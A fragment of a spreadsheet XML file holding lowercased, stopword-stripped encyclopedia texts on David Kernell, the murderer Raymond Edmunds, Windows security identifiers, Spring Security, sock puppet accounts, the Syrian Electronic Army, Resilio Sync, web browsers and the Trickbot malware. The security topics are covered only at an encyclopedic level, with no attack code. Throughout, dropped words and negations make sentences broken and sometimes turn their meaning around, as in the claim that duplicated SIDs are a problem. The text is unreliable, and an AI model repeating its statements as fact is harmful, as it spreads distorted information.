charge wire fraud. deadlocked identity theft charge, judge declared mistrial charge. response, palin issued press release comparing case watergate.sarah palin said family "thankful jury thoroughly carefully weighed evidence issued verdict."the prosecutor, assistant u.s. attorney greg weddle, sought 18-month prison sentence kernell, promised retrial identity theft charge successful attempt receiving trial.in november 2010 kernell sentenced year prison, preferably served halfway house, plus three years probation, u.s. district judge thomas phillips, though noted federal bureau prisons (bop) could override recommendations. however, bop, makes ultimate determination federal prisoners serve sentence, assigned kernell minimum security prison federal correctional institution, ashland near ashland, kentucky. jose santana, chief bop's designation sentence computation center, said halfway houses convicts limited skills and/or limited support families. because kernell support family attended university three years, santana argued need halfway house. kernell later relocated halfway house. perpetrator david carl kernell longtime democratic state representative mike kernell memphis. kernell tennessee open scholastic chess championship 2004, graduated 2006 germantown high school. after release custody, returned university tennessee, knoxville finish economics degree. first volunteered programming skills tennessee voices children, child advocacy nonprofit group. diagnosed multiple sclerosis (ms) 2014, kernell participated clinical research trials cedars-sinai neurosciences research center angeles help develop cures treatments victims after moving california, developed facial recognition software could identify children risk abuse. kernell died february 2018 newport beach, california complications related progressive also email privacy secrecy correspondence references external links court testimony 4chan's founder former administrator "moot"</t>
  </si>
  <si>
    <t>Raymond Edmunds</t>
  </si>
  <si>
    <t>raymond edmunds, also known donvale rapist stinky, born march 1944 queen victoria hospital, melbourne, australia, convicted rapist double murderer active victoria, australia 1960s mid-1980s. crimes 1986, edmunds convicted murders 18-year-old panel beater garry heywood rape murder 16-year-old abina madill murchison east, near shepparton, victoria. february 1966, co-workers attended rock concert respective friends shepparton civic centre, neither returned home. days later, year-olds shooting trip found madill's decomposed remains, heywood's body found metres away. heywood shot head .22-calibre mossberg self-loading rifle; madill raped bludgeoned death.edmunds allegedly previously raped beaten first wife sexually abused three-year-old daughter. edmunds also convicted series rapes 1970s early '80s police then-unknown offender "the donvale rapist". edmunds dubbed stinky" sub-editor melbourne's sunday press newspaper offensive body odour, believed caused mixture milk, manure chemicals work sharecropping farmer dairy properties.sergeant andrew wall, victoria police fingerprint expert, matched fingerprints found holden owned heywood. this occurred computerised processing fingerprints developed fingerprint matching done manually. fingerprint evidence deliberately kept quiet panic offender help become adept hiding prints. these fingerprints connected shepparton murders fingerprint found donvale crime scene. march 1985, edmunds arrested unrelated charges indecent exposure parked station wagon albury, south wales. edmunds pleaded guilty albury court charges, fined $400 prior release. after arrest edmunds fingerprinted prints matched found shepparton crime scene. time, mandatory fingerprinting, whereas victoria become law. convicted serving life sentences minimum term murders total years five rape convictions greensborough donvale.it alleged edmunds committed murders rapes, although maintained innocence. police sought utilise legislation allows compel convicted prisoners provide blood sample testing. point suspect case missing beaumaris girl, eloise worledge. references</t>
  </si>
  <si>
    <t>Security Identifier</t>
  </si>
  <si>
    <t>context microsoft windows line operating systems, security identifier (commonly abbreviated sid) unique, immutable identifier user, user group, security principal. security principal single life given domain), properties principal, including name, associated sid. this design allows principal renamed (for example, "jane smith" "jane jones") without affecting security attributes objects refer principal. overview windows grants denies access privileges resources based access control lists (acls), sids uniquely identify users group memberships. when user logs computer, access token generated contains user group sids user privilege level. when user requests access resource, access token checked permit deny particular action particular object. sids useful troubleshooting issues security audits, windows server domain migrations. format illustrated using following example: "s-1-5-21-3623811015-3361044348-30300820-1013"; identifier authority values identifier authority value known identifier authority values are: identifying capability sid: find registry data, capability sid. design, resolve friendly name. find registry data, known capability sid. continue troubleshoot normal unresolved sid. keep mind small chance could third-party capability sid, case resolve friendly name.per microsoft support: important delete capability sids either registry file system permissions. removing capability file system permissions registry permissions cause feature application function incorrectly. after remove capability sid, cannot back. s-1-5 subauthority values virtual accounts defined fixed class names, account name defined. there nearly infinite number accounts available within virtual account. names work like "account class\account name" "apppoolidentity\default pool". based sha-1 hash lower-case name. virtual accounts given permissions separately maps distinct sid. this prevents "cross-sharing permissions" problem service assigned authority class (such authority\network service") machine sids machine (s-1-5-21) stored security registry hive located security\sam\domains\account, values value binary value computer embedded within data (last bits). (some sources state stored hive instead.) backup located security\policy\polacdms\@. newsid ensures standard format 32-bit subauthorities preceded three 32-bit authority fields). next, newsid generates random computer. newsid's generation takes great pains create truly random 96-bit value, replaces 96-bits subauthority values make computer sid. machine subauthority format used domain sids too. machine considered local domain case. decoding machine machine stored raw-bytes form registry. convert common numeric form, interprets three little endian 32-bit integers, converts decimal, hyphens them. other uses machine also used free-trial programs, start8, identify computer cannot restart trial. service sids service sids feature service isolation, security feature introduced windows vista windows server 2008. service "unrestricted" sid-type property service-specific added access token service host process. purpose service sids allow permissions single service managed without necessitating creation service accounts, administrative overhead. each service local, machine-level generated service name using following formula: s-1-5-80-{sha-1(service name upper case encoded utf-16)} sc.exe command used generate arbitrary service sid: service also referred service\&lt;service_name&gt; (e.g. service\dnscache"). duplicated sids workgroup computers running windows nt/2k/xp, possible user unexpected access shared files files stored removable storage. this prevented setting access control lists susceptible file, effective permissions determined user sid. user duplicated another computer, user second computer could access files user first computer protected. this often happen machine sids duplicated disk clone, common pirate copies. user sids built based machine sequential relative when computers joined domain (active directory domain instance), computer provided unique domain recomputed time computer enters domain. this similar machine sid. result, typically significant problems duplicate sids computers members domain, especially local user accounts used. local user accounts used, potential security issue similar described above, issue limited files resources protected local users, opposed domain users. duplicated sids usually problem microsoft windows systems, although programs detect sids might problems security. microsoft used provide mark russinovich's "newsid" utility part sysinternals change machine sid. retired removed download november 2009. russinovich's explanation neither windows security team could think situation duplicate sids could cause problems all, machine sids never responsible gating network access.at present, supported mechanism duplicating disks windows operating systems sysprep, generates sids. also access control access control matrix discretionary access control (dac) globally unique identifier (guid) mandatory access control (mac) role-based access control (rbac) capability-based security post-cloning operations references external links official objectsid active directory microsoft technet: server 2003: security identifiers technical reference mskb154599: associate username security identifier mskb243330: well-known security identifiers windows operating systems support tools windows server 2003 windows security identifiers windows security docs other understanding sids important microsoft security descriptor (sid) attributes tutorial article handling converting scripts</t>
  </si>
  <si>
    <t>Spring Security</t>
  </si>
  <si>
    <t>spring security java/java framework provides authentication, authorization security features enterprise applications. project started late 2003 'acegi security' (pronounced ah-see-gee whose letters first, third, fifth, seventh, ninth characters english alphabet, order prevent name conflicts) alex, publicly released apache license march 2004. subsequently, acegi incorporated spring portfolio spring security, official spring sub-project. first public release name spring security 2.0.0 april 2008, commercial support training available springsource. authentication flow diagram shows basic flow authentication request using spring security system. shows different filters interact initial browser request, either successful authentication http error. authentication features ldap (using bind-based password comparison strategies) centralization authentication information. single sign-on capabilities using popular central authentication service. java authentication authorization service (jaas) loginmodule, standards-based method authentication used within java. note feature delegation jaas loginmodule. basic access authentication defined 1945. digest access authentication defined 2617 2069. x.509 client certificate presentation secure sockets layer standard. siteminder authentication popular commercial access management product). (unix)-like support switching principal identity http https connection. run-as replacement, enables operation assume different security identity. anonymous authentication, means even unauthenticated principals allocated security identity. container adapter (custom realm) support apache tomcat, resin, jboss jetty (web server). windows ntlm enable browser integration (experimental). form authentication, similar servlet container specification. "remember-me" support http cookies. concurrent session support, limits number simultaneous logins permitted principal. full support customization plugging custom authentication implementations. authorization features aspectj method invocation authorization. http authorization request urls using choice apache paths regular expressions. instance-based security features used specifying access control lists applicable domain objects. spring security offers repository storing, retrieving, modifying acls database. authorization features provided enforce policies method invocations. other features software localization user interface messages language. channel security, automatically switch http https upon meeting particular rules. caching database-touching areas framework. publishing messages facilitate event-driven programming. support performing integration testing junit. spring security comprehensive junit isolation tests. several sample applications, detailed javadocs reference guide. framework independence. releases 2.0.0 (april 2008) 3.0.0 (december 2009) 3.1.0 (december 2011) 3.1.2 (august 2012) 3.2.0 (december 2013) 4.0.0 (march 2015) 4.1.3 (august 2016) 4.2.0 (november 2016) 3.2.10, 4.1.4, 4.2.1 (december 2016) 4.2.2 (march 2017) 4.2.3 (june 2017) 5.0.0 (november 2017) 5.0.8, 4.2.8 (september 2018) 5.1.0 (september 2018) 5.1.1, 5.0.9, 4.2.9 (october 2018) 5.1.2, 5.0.10, 4.2.10 (november 2018) 5.1.3, 5.0.11, 4.2.11 (january 2019) 5.1.4 (february 2019) 5.1.5, 5.0.12, 4.2.12 (april 2019) references external links official website</t>
  </si>
  <si>
    <t>Virtual CloneDrive</t>
  </si>
  <si>
    <t>Social token</t>
  </si>
  <si>
    <t>social token type cryptocurrency used monetize brand. they personal creator tokens) community tokens. value social token revolves around brand issuing used holders feel belonging certain group.social token often used creators monetize personal brand. they provide creators means paid selling tokens, buyers receiving special perks meet greets creators. rewards associated token determined creator. references</t>
  </si>
  <si>
    <t>Sock puppet account</t>
  </si>
  <si>
    <t>sock puppet defined person whose actions controlled another. reference manipulation simple hand puppet made sock, often used refer alternative online identities user accounts used purposes deception. online, came used refer false identity assumed member internet community spoke about, pretending another person.the term expanded include misleading uses online identities, created praise, defend, support person organization, manipulate public opinion, circumvent restrictions, viewing social media account blocked from, suspension, outright website. significant difference pseudonym sock puppet latter poses third party independent main account operator. sock puppets unwelcome many online communities forums. history practice writing pseudonymous self-reviews began internet. writers walt whitman anthony burgess wrote pseudonymous reviews books, benjamin franklin.the oxford english dictionary defines term without reference internet, person whose actions controlled another; minion" 2000 citation u.s. news world report.wikipedia long history problems sockpuppetry. october 2013, wikimedia foundation (wmf) condemned paid advocacy sockpuppeting wikipedia and, days later october specifically banned wiki-pr editing wikipedia. august september 2015, uncovered another group sockpuppets known orangemoody. types block evasion reason sockpuppeting circumvent block, form sanction imposed person's original account. ballot stuffing sockpuppets created online poll increase puppeteer's votes. related usage creation multiple identities, supporting puppeteer's views argument, attempting position puppeteer representing majority opinion sideline opposition voices. abstract theory social networks reputation systems, known sybil attack. sockpuppet-like deceptive fake identities used stealth marketing. stealth marketer creates pseudonymous accounts, claiming different enthusiastic supporter sponsor's product, book ideology. strawman sockpuppet strawman sockpuppet (sometimes abbreviated strawpuppet) false flag pseudonym created make particular point view look foolish unwholesome order generate negative sentiment strawman sockpuppets typically behave unintelligent, uninformed, bigoted manner, advancing "straw man" arguments puppeteers easily refute. intended effect discredit rational arguments made position. such sockpuppets behave similar manner internet trolls. particular case concern troll, false flag pseudonym created user whose actual point view opposed sockpuppet. concern troll posts forums devoted declared point view attempts sway group's actions opinions claiming share goals, professed "concerns". goal fear, uncertainty doubt (fud) within group. meatpuppet some online sources term "meatpuppet" describe sockpuppet behaviors. example, according online encyclopedia, meatpuppet "publishes comments blogs, wikis public venues phenomenon product order generate public interest buzz"—that engaged behavior widely known "astroturfing". 2006 article chronicle higher education defined meatpuppet peculiar inhabitant digital world—a fictional character passes real person online." investigation sockpuppetry number techniques developed determine whether accounts sockpuppets, including comparing addresses suspected sockpuppets comparative analysis writing style suspected sockpuppets. using geoip possible look addresses locate them. legal implications sockpuppetry united states 2008, 49-year-old missouri resident lori drew prosecuted found guilty federal court jury connection creation myspace account claimed 16-year-old named josh evans. drew's goal create relationship megan meier, 13-year-old girl conflict drew's daughter. after "josh" ended relationship megan, megan committed suicide. drew found guilty connection misrepresenting identity violation myspace terms service. although angeles u.s. attorney claimed conduct covered federal computer fraud legislation "accessing computer without authorization interstate commerce", trial court granted motion drew throw verdict. drew successfully argued false identity constitute unauthorized access myspace, citing 1973 breach contract dispute court appeals ruled "fraudulently induced consent consent nonetheless." prosecution appealed trial court judge's decision throw guilty verdict, later dropped appeal.in 2010, people golb, 50-year-old lawyer raphael golb convicted criminal charges, including identity theft, criminal impersonation, aggravated harassment, using multiple sockpuppet accounts attack impersonate historians perceived rivals father, norman golb. golb defended actions "satirical hoaxes" protected free-speech rights. disbarred sentenced months prison, sentence reduced probation appeal.in 2014 florida state circuit court held sock puppetry tortious interference business relations, awarded injunctive relief pendency litigation. court found "the falsifying multiple identities" conduct enjoined. explained conduct wrongful "not statements false true, conduct making names persons exist post fake comments fake people support defendants' position tortiously interferes plaintiffs' business" "conduct inherently unfair." court, therefore, ordered defendants "remove cause removed postings creating false impression [than one] person commenting program th[an] actually exist." court also found, however, comments defendants "which create false impression fake patients fake employees fake persons connected program (those posted respective names) protected constitution united states america, first amendment." examples sockpuppetry business promotion 2007, whole foods, john mackey, discovered posted "rahodeb" yahoo! finance message board, extolling company predicting dire future rival, wild oats markets, concealing relationship companies. whole foods argued none mackey's actions broke law.during 2007 trial conrad black, chief executive hollinger international, prosecutors alleged posted messages yahoo! finance chat room using name "nspector", attacking short sellers blaming company's stock performance. prosecutors provided evidence postings black's criminal trial, convicted mail fraud obstruction. postings raised multiple points trial. book film reviews amazon.com computer glitch 2004 revealed names many authors written pseudonymous reviews books. john rechy, wrote best-selling novel city night (1963), among authors unmasked way, shown written numerous five-star reviews work. 2010, historian orlando figes found written amazon reviews names "orlando-birkbeck" "historian", praising books condemning fellow historians rachel polonsky robert service. sued figes monetary damages.during panel discussion british crime writers festival 2012, author stephen leather admitted using pseudonyms praise books, claiming "everyone it". spoke building "network characters", operated friends, discussed books conversations directly. year, pressured novelist jeremy duns twitter, detected possible indications online, crime fiction writer r.j. ellory admitted used pseudonymous account name write positive review novels, additionally negative review authors.david manning fictitious film critic, created marketing executive working sony corporation give consistently good reviews releases sony subsidiary columbia pictures, could quoted promotional material. blog commentary american reporter michael hiltzik temporarily suspended posting blog, "the golden state", angeles times website admitted "posting there, well sites, false names." used pseudonyms attack conservatives hugh hewitt l.a. prosecutor patrick frey—who eventually exposed him. hiltzik's blog times newspaper's first blog. while suspended blogging, hiltzik continued write regularly newspaper. siegel, writer republic magazine, suspended defending articles blog comments user name "sprezzatura". comment, "sprezzatura" defended siegel's reviews stewart: "siegel brave, brilliant wittier stewart ever be." politically oriented late november 2020, network reported example white male republican trump voter sockpuppet twitter account presented black man, criticizing biden praising trump systematically emphasizing race sexual orientation. additionally, october 2020, clemson university social media researcher identified "more dozen twitter accounts claiming black trump supporters gained hundreds thousands likes retweets span days, sparking major doubts identities," many using photos black news reports stock images "including text 'black photo' still watermarked image". government sockpuppetry example state-sponsored internet sockpuppetry, 2011, company called ntrepid awarded $2.76 million contract u.s. central command "online persona management" operations create "fake online personas influence conversations spread u.s. propaganda" arabic, persian, urdu pashto part operation earnest voice. september 2014, number sockpuppet accounts reported explosion chemical plant louisiana. reports came range media, including twitter youtube, u.s. authorities claimed entire event hoax. information determined many originated russian government-sponsored sockpuppet management office saint petersburg, called internet research agency. russia implicated u.s. intelligence community 2016 hiring trolls 2016 united states presidential election.the institute economic affairs claimed 2012 paper united kingdom government european union fund charities campaign lobby causes government supports. example, responses government consultation direct result campaigns alleged "sockpuppet" organizations. also references external links sock puppet jargon file</t>
  </si>
  <si>
    <t>Syrian Electronic Army</t>
  </si>
  <si>
    <t>syrian electronic army (sea; arabic: الجيش السوري الإلكتروني) group computer hackers first surfaced online 2011 support government syrian president bashar al-assad. using spamming, website defacement, malware, phishing, denial-of-service attacks, targeted terrorist organizations, political opposition groups, western news outlets, human rights groups websites seemingly neutral syrian conflict. also hacked government websites middle east europe, well defense contractors. 2011 "the first arab country public internet army hosted national networks openly launch cyber attacks enemies".the precise nature sea's relationship syrian government changed time unclear. origins historical context 1990s syrian president bashar al-assad headed syrian computer society, connected sea, according research university toronto university cambridge, there evidence syrian malware team goes back january 2011. february 2011, years internet censorship, syrian censors lifted facebook youtube. april 2011, days anti-regime protests escalated syria, syrian electronic army emerged facebook. 2011 syrian computer society registered sea’s website (syrian-es.com). because syria's domain registration authority registered hacker site, security experts written group supervised syrian state. claimed webpage official entity, group enthusiastic syrian youths could stay passive towards massive distortion facts recent uprising syria". soon 2011 removed text denied official entity. commentator noted "[sea] volunteers might include syrian diaspora; hacks used colloquial english reddit memes. july 2011, emerged bashar al-assad's page facebook page member syrian electronic army close regime, haidara suleiman, powerful intelligence officer former syrian ambassador amman, bahjat suleiman. told "the official media unfortunately weak... this electronic media show people what's going on."according 2014 report security company intelcrawler, activity shown links "officials syria, iran, lebanon hezbollah." february 2015 article york times stated "american intelligence officials" suspect "actually iranian". however, data shown link iran's syria's cyber attack patterns according analysis "open-source intelligence" cyber security firm recorded future. online activities pursued activities three areas: website defacement electronic surveillance syrian rebels opposition: carried surveillance discover identities location syrian rebels, using malware (including blackworm tool), phishing, denial service attacks. 2013 electronic monitoring extended foreign workers. defacement attacks western websites contends spread news hostile syrian government: these included news websites news, associated press, national public radio, news, jazeera, financial times, daily telegraph, washington post, syrian satellite broadcaster orient dubai-based al-arabia well rights organizations human rights watch. targets include voip apps, viber tango. spamming popular facebook pages pro-regime comments: facebook pages president barack obama former french president nicolas sarkozy targeted spam campaigns. global cyber espionage: "technology media companies, allied military procurement officers, defense contractors, foreign attaches embassies".the sea's tone style vary serious openly political ironic statements intended critical pointed humor: "exclusive: terror striking #usa #obama shamelessly al-qaeda" tweeted twitter account minutes, july 2012 posted think saudi qatar keep funding armed gangs syria order topple government? #syria," jazeera's twitter account message removed. another attack, members used weather channel twitter account post headline, "saudi weather station head on-collision camel." after washington post reporter fisher called jokes unfunny, hacker associated group told vice interview 'haters gonna hate.'" operating system october 2014, released linux distribution named seanux. timeline notable attacks 2011 july 2011: university california angeles website defaced hacker "the pro". september 2011: harvard university website defaced called work "sophisticated group individual". harvard homepage replaced image syrian president bashar al-assad message "syrian electronic army were here".2012april 2012: official blog social media website linkedin redirected site supporting bashar al-assad. august 2012: twitter account reuters news agency sent tweets false information conflict syria. reuters news website compromised, posted false report conflict journalist's blog. 2013 april 2013: team gamerfood homepage defaced. april 2013: associated press twitter account falsely claimed white house bombed president barack obama injured. this us$136.5 billion decline value day. 2013: twitter account onion compromised phishing google apps accounts onion's employees. platform also used hackers spread pro-syrian tweets. 2013: news london twitter account hacked. 2013: android applications british broadcaster news hacked google play store. july 2013: truecaller servers hacked syrian electronic army. group claimed twitter handle recovered gibs database, primarily older version wordpress installed servers. hackers released truecaller's alleged database host username, password another tweet. july 2013, truecaller confirmed blog website hacked, claimed attack disclose passwords credit card information. july 2013: viber servers hacked, support website replaced message supposed screenshot data obtained intrusion. august 2013: advertising service outbrain suffered spearphishing attack placed redirects websites washington post, time, cnn. august 2013: nytimes.com redirected page displayed message "hacked sea" twitter's domain registrar changed. august 2013: twitter's registration showed admin tech contacts, users reported site's cascading style sheets (css) compromised. 29–30 august 2013: york times, huffington post, twitter knocked sea. person claiming speak group stepped forward attacks increasing likelihood military action response al-assad using chemical weapons. self-described operative told news e-mail exchange: "when hacked media destroy site publish possible, publish article [that] contains truth happening syria. launch attack syria methods causing harm, u.s. economy other." september 2013: pro-syria hackers broke internet recruiting site marine corps, posting message urged soldiers refuse orders washington decides launch strike syrian government. site, www.marines.com, paralyzed several hours redirected seven-sentence message "delivered sea". september 2013: global post's official twitter account website hacked. posted twitter account, "think twice publish untrusted informations [sic] syrian electronic army" "this time hacked website twitter account, next time start searching job" october 2013: gaining access gmail account organizing action staffer, altered shortened urls president obama's facebook twitter accounts point 24-minute pro-government video youtube. november 2013: hacked website vice, no-affiliate news/documentary/blog website, filmed numerous times syria side rebel forces. logging vice.com redirected appeared homepage. november 2013: hacked facebook page matthew vandyke, libyan civil veteran pro-rebel news reporter. 2014 january 2014: hacked skype's facebook, twitter blog, posting related picture telling users microsoft's e-mail service outlook.com —formerly known hotmail—claiming microsoft sells user information government. january 2014: hacked xbox support twitter pages directed tweets group's website. january 2014: hacked official microsoft office blog, posting several images tweeted attack. january 2014: cnn's huracan campeón 2014 official twitter account showed messages, including photo syrian flag composed binary code. removed tweets within minutes. february 2014: hacked websites ebay paypal source reported hackers said show took data. february 2014: hacked facebook. sources said registrant contact details restored facebook confirmed traffic website hijacked, users social network affected. february 2014: hacked forbes website twitter accounts. april 2014: hacked information security-related conference website. june 2014: hacked websites british newspapers (united kingdom) sunday times. june 2014: reuters website hacked second time showed message condemning reuters "publishing false articles syria". hackers compromised website, corrupting served taboola. november 2014: hacked hundreds sites hijacking gigya's comment system prominent websites, displaying message "you've hacked syrian electronic army(sea)." affected websites included aberdeen evening express, logitech, forbes, independent magazine, london evening standard, telegraph, nbc, national hockey league, finishline.com, pch.com, time york t3.com tech website), stv.com, walmart canada, pacsun, daily mail websites, bikeradar.com (cycling website), sparknotes, millionshort.com, milenio.com, mediotiempo.com, todobebe.com myrecipes.com, bdlive south africa, muscleandfitness.com, news. 2015 january 2015: french newspaper monde wrote hackers "managed infiltrate publishing tool launching denial service". 2018 2018: suspects indicted united states "conspiracy" hacking several websites. 2021 october 2021: facebook discovers presence several fake accounts affiliated organizations. accounts reportedly used target syrian opposition figures human rights activists, well members white helmets. legal actions 2016: syrian electronic army member peter romar extradited germany united states face charges brought department justice engaging multi-year criminal conspiracy conduct computer intrusions perceived detractors president bashar al-assad, including media entities, white house foreign governments." also advanced persistent threat hacktivism internet censorship syria unit 61398 tailored access operations references external links syrian electronic army twitter account youtube channel pinterest profile syrian electronic army profile syrian electronic army syrianelectronicarmy.com, first website later redirected replacement sea.sy, sea's newer website, started late 2013; access revoked syrian computer society (site displays blank loading page browser, widget returns "error 403: forbidden" august 2013) emergence open organized pro-government cyber attacks middle east: case syrian electronic army, helmi noman, 2011, published information warfare monitor, public-private partnership university ottawa secdev group, including screenshots activities. google cache website mentioned information warfare monitor report citing syrian.es.sy@gmail.com contact address links facebook page called sea.vic0r.2 vict0r battalion syrian electronic army page longer available september 2013. understanding syrian electronic army (sea), hp-security research blog syrian cyber hackers charged from ‘syrian electronic army’ added cyber’s most wanted (fbi)</t>
  </si>
  <si>
    <t>Resilio Sync</t>
  </si>
  <si>
    <t>resilio sync (formerly bittorrent sync) resilio, inc. proprietary peer-to-peer file synchronization tool available windows, mac, linux, android, ios, windows phone, amazon kindle fire bsd. sync files devices local network, remote devices internet modified version bittorrent protocol. although touted developers intended direct replacement competitor cloud-based file synchronization services, attained much publicity potential role. this mainly ability resilio sync address many concerns existing services relating file storage limits, privacy, cost, performance. history january 2013, bittorrent, inc. announced call pre-alpha testers help test "distributed syncing product help manage personal files multiple computers".several private pre-alpha builds "syncapp" subsequently made available limited group alpha testers january 2013 april 2013. mid-april 2013, name "syncapp" dropped favor "bittorrent sync".on april 2013, previously private "alpha" opened general users.as 2013, petabyte anonymous data synced users, terabytes synced daily.as july 2013, eight petabytes data synced using software.on july 2013, bittorrent sync migrated "alpha" "beta", released android app, introduced versioning.on august 2013, bittorrent sync announced.on november 2013, bittorrent announced release bittorrent sync beta version client, along milestone, million monthly active users synced petabytes data date.as august 2014, million user installs petabytes data synced users.on march 2015, product finally exited beta commercial product, inclusion paid version.on september 2015, release sync 2.2, free version, folder limit introduced removed.on january 2016, release sync introduced encrypted folder, well ability windows service, cards android and, paid users, selective sync support linux.on june 2016, product team spun bittorrent inc. independent company, resilio inc. continue development product name resilio sync. former bittorrent eric klinker became head company. technology resilio sync synchronizes files using bittorrent. user's data stored user's local device instead "cloud", therefore requiring least user devices, "nodes," online synchronize files them. resilio sync encrypts data advanced encryption standard aes-128 counter mode either randomly generated user. this derived "secret" shared users share data. data sent devices directly unless target device unreachable (e.g. behind firewall), case data first relayed intermediary node. many devices connected simultaneously files shared mesh networking topology. there limit amount data synced, available free space device. compatibility current builds resilio sync available following operating systems: microsoft windows (windows later bit) (10.8 later) linux (web interface, also available debian derived systems)freebsd devicesandroid amazon kindle windows phone also syncthing free open-source peer-to-peer file synchronization application comparison file synchronization software references external links official website latest desktop build 2.7.3</t>
  </si>
  <si>
    <t>Web browser</t>
  </si>
  <si>
    <t>browser (also referred internet browser simply browser) application software accessing world wide local website. when user requests page particular website, browser retrieves necessary content server displays page user's device. browser thing search engine, though often confused. search engine website provides links websites. however, connect website's server display pages, user must browser installed.web browsers used range devices, including desktops, laptops, tablets, smartphones. 2020, estimated billion people used browser. used browser google chrome, global market share devices, followed safari 20%.in hypertext transfer protocol technical texts, browsers (and clients) commonly referred user agents. function purpose browser fetch content local storage device display user's device. this process begins user inputs uniform resource locator (url), https://en.wikipedia.org/, browser. virtually urls start either http: https: means browser retrieve hypertext transfer protocol (http). case secure mode (https), communication browser server encrypted purposes security privacy. once page retrieved, browser's rendering engine displays user's device. this includes image video formats supported browser. many browsers display partial content, retrieval still progress, providing responsive behavior, especially slower network connections. pages usually contain hyperlinks pages resources. each link contains url, clicked tapped, browser navigates resource. thus, process bringing content user begins again. most browsers internal cache page resources improve loading times subsequent visits page. cache store many items, large images, need downloaded server again. cached items usually stored long server stipulates http response messages. settings browsers typically configured built-in menu. depending browser, menu named settings, options, preferences. menu different types settings. example, users change homepage default search engine. they also change default page colors fonts. various network connectivity privacy settings also usually available. privacy during course browsing, cookies received various websites stored browser. some contain login credentials site preferences. however, others used tracking user behavior long periods time, browsers typically provide section menu deleting cookies. finer-grained management cookies usually requires browser extension.browsers also usually provide menu items deleting browsing history, cache entries, potentially sensitive data. alternative approach private browsing mode, aforementioned items stored browser. temporary option, activated using special mode. features popular browsers number features common. they automatically browsing history used non-logging private mode. they also allow users bookmarks, customize browser extensions, manage user passwords. some provide sync service accessibility features. most browsers user interface (ui) features: allow user open multiple pages time, either different browser windows different tabs window. back forward buttons back previous page visited forward next one. refresh reload stop button reload cancel loading current page. browsers, stop button merged reload button.) home button return user's home page. address input page display search input terms search engine. browsers, search merged address bar.)while mobile browsers similar features desktop versions, limitations touch screens require mobile simpler. difference significant users accustomed keyboard shortcuts. popular desktop browsers also sophisticated development tools. besides common usage graphical browsers, niche text-based headless types browsers. security browsers popular targets hackers, exploit security holes steal information, destroy files, malicious activities. browser vendors regularly patch security holes, users strongly encouraged keep browser software updated. other protection measures antivirus software avoiding known-malicious websites. history first browser, called worldwideweb, created 1990 berners-lee. recruited nicola pellow write line mode browser, displayed pages dumb terminals. 1993 landmark year release mosaic, credited "the world's first popular browser". innovative graphical user interface made world wide system easy thus accessible average person. this, turn, sparked internet boom 1990s, grew rapid rate. marc andreessen, leader mosaic team, soon started company, netscape, released mosaic-influenced netscape navigator 1994. navigator quickly became popular browser.microsoft debuted internet explorer 1995, leading browser netscape. within years, microsoft gained dominant position browser market reasons: bundled internet explorer popular windows operating system freeware restrictions usage. market share internet explorer peaked early 2000s.in 1998, netscape launched would become mozilla foundation create browser using open source software model. this work evolved firefox browser, first released mozilla 2004. firefox market share peaked 2010.apple released safari browser 2003. safari remains dominant browser apple devices, though become popular elsewhere.google debuted chrome browser 2008, steadily took market share internet explorer became popular browser 2012. chrome remained dominant ever since. microsoft released edge browser 2015 part windows release. (internet explorer still used older versions windows.) since early 2000s, browsers greatly expanded html, css, javascript, multimedia capabilities. reason enable sophisticated websites, apps. another factor significant increase broadband connectivity, enables people access data-intensive content, youtube streaming, possible dial-up modems. market share also list browsers comparison browsers references external links media related browsers wikimedia commons</t>
  </si>
  <si>
    <t>Trickbot</t>
  </si>
  <si>
    <t>trickbot computer malware, trojan microsoft windows operating systems, cybercrime group behind this. major function originally theft banking details credentials, operators extended capabilities create complete modular malware ecosystem. trickbot cybercrime organization large well-organized, possible connections russian intelligence agencies. capabilities trickbot first reported october 2016. propagated methods including executable programs, batch files, email phishing, google docs, fake sexual harassment claims.the site bleeping computer tracked evolution trickbot start banking trojan. articles cover extension attack paypal business customer relationship management (crm; june 2017),the addition self-spreading worm component (july 2017), coinbase.com, dkim support bypass email filters, steal windows problem history, steal cookies (july 2019), targets security software microsoft defender prevent detection removal (july 2019), steal verizon wireless, t-mobile, sprint codes injecting code accessing site (august 2019), steal openssh openvpn keys (november 2019), spread malware network (january 2020), bypass windows steal active directory credentials (january 2020), fake covid-19 emails news (since march 2020), bypass android mobile two-factor authentication, checks whether virtual machine anti-malware experts; july 2020), infecting linux systems (july 2020).trickbot provide malware access-as-a-service infected systems, including ryuk (january 2019) conti ransomware; emotet spam trojan known install trickbot (july 2020).in 2021, researcher reported trickbot improved enhanced features creative mutex naming algorithm updated persistence mechanism. infections september 2020, hospitals healthcare systems shut cyber attack using ryuk ransomware. believed likely emotet trojan started botnet infection sending malicious email attachments 2020. after time, would install trickbot, would provide access ryuk.despite efforts extinguish trickbot, american federal agencies warned october 2020 "credible information increased imminent cybercrime [ransomware] threat hospitals healthcare providers" covid-19 cases spiking. after previous month's attacks, five hospitals attacked week, hundreds potential targets. ryuk, seeded trickbot, method attack. arrests august 2020, department justice issued arrest warrants threat actors running trickbot botnet. january 2021, administrator virus distribution component trickbot, emotet, arrested ukraine. february 2021, (aka: alla witte; alla klimova; алла климова;) developer trickbot platform ransomware components, arrested. retaliation from september 2020, trickbot botnet attacked believed cyber command branch department defense several security companies. configuration file delivered systems infected trickbot changed command control server address 127.0.0.1 (localhost, address cannot access internet). efforts actually started several months earlier, several disruptive actions. project aims long-term effects, gathering carefully analyzing data botnet. undisclosed number servers also taken legal procedures communication bots hosting provider level. action started district court eastern district virginia granted microsoft's request court order stop trickbot activity. technical effort required great; part attack, eset's automatic systems examined 125,000 trickbot samples 40,000 configuration files least individual plugins used malware steal passwords, modify traffic, self-propagate. attacks would disrupt trickbot significantly, fallback mechanisms recover, difficulty, computers removed botnet. reported short-term disruption, botnet quickly recovered infrastructure remaining intact.the government considered ransomware major threat 2020 elections, attacks steal encrypt voter information election results, impact election systems.on october 2020, security message bleeping computer website reported trickbot operation brink completely shutting following efforts alliance cybersecurity hosting providers targeting botnet's command control servers", relatively ineffective disruptive actions earlier month. coalition headed microsoft's digital crimes unit (dcu) serious impact, although trickbot continued infect computers. october, microsoft stated trickbot's critical operational infrastructure servers eliminated. some trickbot servers remained active brazil, colombia, indonesia, kyrgyzstan. constant action, technical legal, required prevent trickbot re-emerging unique architecture. although evidence trickbot targeting election november 2020, intense efforts continued date. also wizard spider group known software references</t>
  </si>
  <si>
    <t>Web banner</t>
  </si>
  <si>
